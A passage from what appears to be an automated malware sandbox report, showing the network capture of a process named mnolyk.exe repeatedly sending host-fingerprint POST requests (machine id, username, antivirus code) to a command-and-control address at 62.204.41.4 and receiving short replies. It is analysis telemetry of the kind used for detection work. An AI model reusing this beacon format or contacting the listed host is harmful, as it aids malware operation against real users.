                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.436558008 CET558INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        358192.168.2.55004862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:24.617449999 CET559OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.693803072 CET559INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        359192.168.2.55004962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:24.878640890 CET560OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:24.941565990 CET560INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        36192.168.2.54972662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:43.296876907 CET236OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:43.361358881 CET237INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        360192.168.2.55005062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:25.142674923 CET561OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.208817005 CET561INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        361192.168.2.55005162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:25.382181883 CET562OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.447067022 CET562INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        362192.168.2.55005262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:25.625283957 CET563OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.689321041 CET563INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        363192.168.2.55005362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:25.872782946 CET564OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:25.937591076 CET564INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        364192.168.2.55005462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:26.116806030 CET565OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.183963060 CET565INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        365192.168.2.55005562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:26.352552891 CET566OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.418876886 CET566INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        366192.168.2.55005662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:26.630496025 CET567OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.694760084 CET567INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        367192.168.2.55005762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:26.865833998 CET568OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:26.931377888 CET568INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        368192.168.2.55005862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:27.099529982 CET569OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:27.164002895 CET569INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        369192.168.2.55005962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:27.376297951 CET570OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:27.439764977 CET570INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        37192.168.2.54972762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:43.531560898 CET237OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:43.601125956 CET238INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        370192.168.2.55006062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:27.627657890 CET571OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:27.692301035 CET571INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        371192.168.2.55006162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:27.966193914 CET572OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.031424046 CET572INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        372192.168.2.55006262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:28.208950043 CET573OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.272694111 CET573INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        373192.168.2.55006362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:28.448525906 CET574OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.513607979 CET574INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        374192.168.2.55006462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:28.682743073 CET575OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:28.748486042 CET575INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        375192.168.2.55006562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:28.913263083 CET576OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
